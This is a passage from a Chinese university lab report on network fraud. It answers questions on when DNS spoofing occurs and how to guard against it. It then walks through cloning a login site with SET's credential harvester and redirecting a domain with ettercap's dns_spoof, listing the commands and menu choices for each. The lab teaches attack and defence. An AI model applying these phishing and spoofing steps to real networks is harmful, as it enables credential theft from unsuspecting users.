标签:hub href asp sdn details windows vi编辑 logs detail
回答问题
(1)通常在什么场景下容易受到DNS spoof攻击
这个问题在此次实验中就可以得出答案,实验中的流程需要连接到不安全的网络,需要扫描到靶机后才能设置为目标,所以一般是在使用公用网络或者钓鱼WIFI时容易受到DNS欺骗攻击
(2)在日常生活工作中如何防范以上两攻击方法
对于普通用户来说,windows似乎也有一定的防范措施,当连接到一个wifi时会提示该网络的类型,公用,家庭等等,应该会有不同的基础安全防护,在做第二个实验时我的win10就没成功。
对于我们来说,就要避免随便连wifi等危险操作,其次在访问网站后先查看其证书是否有效。比如实验中我的IE就提示了其不受信任
1.简单应用SET工具建立冒名网站
sudo vi /etc/apache2/ports.conf
netstat -tupln | grep 80
查看80端口状态,如被占用需要kill占用它的进程apachectl start
开启Apache服务setoolkit
打开SET工具1
,社会工程学攻击1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
2
,钓鱼网站攻击向量1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
3
登陆密码截取攻击1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
2
网站克隆1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
192.168.43.171
和要克隆的url:www.mosoteach.cn
ifconfig eth0 promisc
,修改kali网卡为混杂模式vi /etc/ettercap/etter.dns
修改DNS缓存表ettercap -G
打开ettercapSniff
-->unified sniffing
指定监听的网卡Hosts
-->Scan for hosts
扫描子网Hosts
-->Hosts list
查看子网主机列表netstat -rn
查看kali网关地址Targert1
,将靶机IP添加到Targert2
Plugins
-->Manage the plugins
-->双击dns_spoof
start
-->start sniffing
开始嗅探ping
之前设定的域名,查看是否欺骗成功www.cnblogs.com
192.168.43.171
,并开始dns_spoof
kali端的响应
setoolkit
,直接intall
不行,百度里安装教程也就两三篇博客,太少了吧!心塞,大家都能直接用TATgit clone https://github.com/trustedsec/social-engineer-toolkit/ set/ /* 又是一段十分漫长 漫长 漫长 漫长的时光 */
cd set
./setoolkit
本次实验中的网站克隆十分有趣,靶机输入kali的IP即可访问该网站。实验二中DNS欺骗的在很久之前就学过了,终于在这次应用于实践,而这两种的组合使用,能够达到意想不到的效果,真是太强了。
2018-2019-2 网络对抗技术 20165228 Exp7 网络欺诈防范
标签:hub href asp sdn details windows vi编辑 logs detail
原文地址:https://www.cnblogs.com/cloud795/p/10804342.html